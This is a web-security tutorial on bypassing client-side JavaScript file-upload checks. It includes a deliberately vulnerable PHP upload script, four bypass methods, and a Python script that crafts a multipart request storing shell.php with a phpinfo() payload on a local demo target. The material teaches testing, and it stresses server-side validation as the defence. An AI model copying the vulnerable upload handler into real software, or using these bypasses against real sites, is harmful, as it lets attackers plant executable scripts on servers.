One kind of check that comes up constantly in file-upload vulnerabilities, and that annoys many testers, is client-side JS validation. A quick way to tell whether a site relies on it is the response speed: JS validation runs locally in the browser, so when you pick a file of a disallowed type the rejection appears immediately, before any request reaches the server. An instant "file type not allowed" message with no server round trip is a strong sign that the site uses JS validation.
JS validation bypass demo code:
```php
<?php
/**
 * Created by cracer
 * Date: 15-10-7
 * Time: 13:19
 * Name: upload1.php
 * cracer: http://www.cracer.com/
 */
// File upload vulnerability demo script: JS (client-side) validation only.
// Deliberately vulnerable: the server never checks the file name, type or content.
$uploaddir = 'uploads/';
if (isset($_POST['submit'])) {
    if (file_exists($uploaddir)) {
        // The browser-supplied name is used verbatim, so a .php upload lands as a runnable script.
        if (move_uploaded_file($_FILES['upfile']['tmp_name'], $uploaddir . '/' . $_FILES['upfile']['name'])) {
            echo 'File uploaded successfully, saved as: ' . $uploaddir . $_FILES['upfile']['name'] . "\n";
        }
    } else {
        exit($uploaddir . ' folder does not exist, please create it manually!');
    }
    //print_r($_FILES);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=gbk"/>
<meta http-equiv="content-language" content="zh-CN"/>
<title>File upload vulnerability demo script -- JS validation example</title>
<script type="text/javascript">
function checkFile() {
    var file = document.getElementsByName('upfile')[0].value;
    if (file == null || file == "") {
        alert("You have not selected a file, nothing to upload!");
        return false;
    }
    // Extensions allowed for upload
    var allow_ext = ".jpg|.jpeg|.png|.gif|.bmp|";
    // Extract the extension of the chosen file
    var ext_name = file.substring(file.lastIndexOf("."));
    //alert(ext_name);
    //alert(ext_name + "|");
    // Check whether the extension is allowed; this runs only in the browser
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "This file type is not allowed. Please upload a " + allow_ext + " file. Current file type: " + ext_name;
        alert(errMsg);
        return false;
    }
}
</script>
</head>
<body>
<h3>File upload vulnerability demo script -- JS validation example</h3>
<form action="" method="post" enctype="multipart/form-data" name="upload" onsubmit="return checkFile()">
    <!-- the value was garbled in the source text; 204800 (200 KB) is assumed here -->
    <input type="hidden" name="MAX_FILE_SIZE" value="204800"/>
    Select the file to upload: <input type="file" name="upfile"/>
    <input type="submit" name="submit" value="Upload"/>
</form>
</body>
</html>
```
Note: keep the folder path and file names in plain ASCII; non-ASCII names may cause errors.
Save the code as upload.php and create an uploads folder in the same directory to hold the uploaded files.
JS validation bypass methods
Client-side JS validation is the easiest kind to bypass. It is well known that client-based validation is unsafe: the attacker controls the browser, so any check that runs only there can be removed or altered at will, and a server that performs no check of its own will accept whatever it is sent. Several bypass methods are shown here.
How to determine whether file upload is based on client-side JS verification?
There are several ways: view the page source for validation code attached to the upload form; use a packet capture tool or proxy to check whether the browser actually sent a request to the server when the file was rejected (if no request left the browser, the check is client-side JS); or simply upload an arbitrary file and look at the result.
As shown in the picture above, JS validation pops up an alert as soon as you submit the upload form and stops the file from being sent to the server at all. The bypass methods are as follows:
A. Delete the validation code attached to the form's onsubmit event (the checkFile() call) in the page, then submit the upload normally.
This is done in the browser with Firebug or the developer tools: once the onsubmit handler is removed, the form submits without any check.
B. Edit the list of allowed extensions in the upload JS code and add the extension you want to upload.
The next two methods are simple to carry out and are not demonstrated here.
C. Save the form locally, adjust it as needed (remove the onsubmit attribute and point the action at the target URL), and submit it from the local copy.
D. Submit through a proxy such as Burp Suite or Fiddler: rename the local file to .jpg so the JS check passes, intercept the upload request, and change the file extension in the request back to asp (or php, for this demo script).
Any of these four methods can be used freely; all of them bypass local JS validation.
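The two request-level methods (C and D) come down to the same fact: the server only ever sees a multipart/form-data body, and the JS check never touches it. The following Python script is an added example, not code from the original article or from cracer; it builds the multipart body the demo form would send (method C, with no onsubmit check), and rewrites the filename in an intercepted body the way you would in Burp Suite (method D). The target URL, the boundary string and the phpinfo() payload are assumptions; the field names upfile and submit come from the demo script above.

```python
"""Bypass client-side upload validation by talking to the server directly.

Added example for the article's methods C and D; not the demo script's own code.
Assumptions: the demo script is served at TARGET, the form field names are
'upfile' and 'submit' (as in the demo), and the payload is a harmless phpinfo().
"""
import re
import urllib.request

TARGET = "http://127.0.0.1/upload.php"      # assumed location of the demo script
FIELD = "upfile"                            # file input name from the demo form
BOUNDARY = "----FormBoundaryAddedExample"   # arbitrary; a browser picks its own
PAYLOAD = b"<?php phpinfo(); ?>"            # constructed proof-of-execution payload

# Matches the Content-Disposition filename attribute of the file part.
_FILENAME_RE = re.compile(
    rb'(name="' + re.escape(FIELD.encode()) + rb'"; filename=")([^"\r\n]*)(")'
)


def build_upload_body(filename, content, boundary=BOUNDARY):
    """Method C: build the multipart/form-data body the browser would send.

    There is no checkFile() here, so the filename can be anything, shell.php
    included. The 'submit' field is required because the demo script only
    processes the upload when isset($_POST['submit']) is true.
    """
    crlf = b"\r\n"
    dash = ("--" + boundary).encode()
    parts = [
        dash,
        ('Content-Disposition: form-data; name="%s"; filename="%s"'
         % (FIELD, filename)).encode(),
        b"Content-Type: application/octet-stream",
        b"",
        content,
        dash,
        b'Content-Disposition: form-data; name="submit"',
        b"",
        b"Upload",
        dash + b"--",
        b"",
    ]
    return crlf.join(parts)


def rewrite_filename(body, new_name):
    """Method D: the file was chosen as shell.jpg so the JS check passed; the
    intercepted request is edited so the server stores it as shell.php.
    Only the filename= attribute changes; the rest of the body is untouched."""
    new_body, count = _FILENAME_RE.subn(
        lambda m: m.group(1) + new_name.encode() + m.group(3), body, count=1)
    if count != 1:
        raise ValueError("no file part for field %r found in request body" % FIELD)
    return new_body


def extract_filename(body):
    """Return the filename the server will see for the file part, or None."""
    m = _FILENAME_RE.search(body)
    return m.group(2).decode() if m else None


def send_upload(body, url=TARGET, boundary=BOUNDARY):
    """POST the body to the demo script and return the response text.
    Needs the demo script running at `url`; not exercised offline."""
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "multipart/form-data; boundary=" + boundary},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # What the browser sends after the JS check passed (shell.jpg) ...
    intercepted = build_upload_body("shell.jpg", PAYLOAD)
    # ... and the same request after the Burp-style edit.
    edited = rewrite_filename(intercepted, "shell.php")
    print(edited.decode())
    # print(send_upload(edited))  # uncomment with the demo script running locally
```

Methods A and B need no script at all: in the browser console, `document.forms['upload'].onsubmit = null;` removes the check for the demo form, and editing `allow_ext` in the loaded page achieves B. The point of the script is that none of these steps change what the server receives; the only real defence is a check performed on the server side.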
The above is the full content of "Breakthrough JS local verification solution". For more information, see the other related articles on the PHP Chinese website.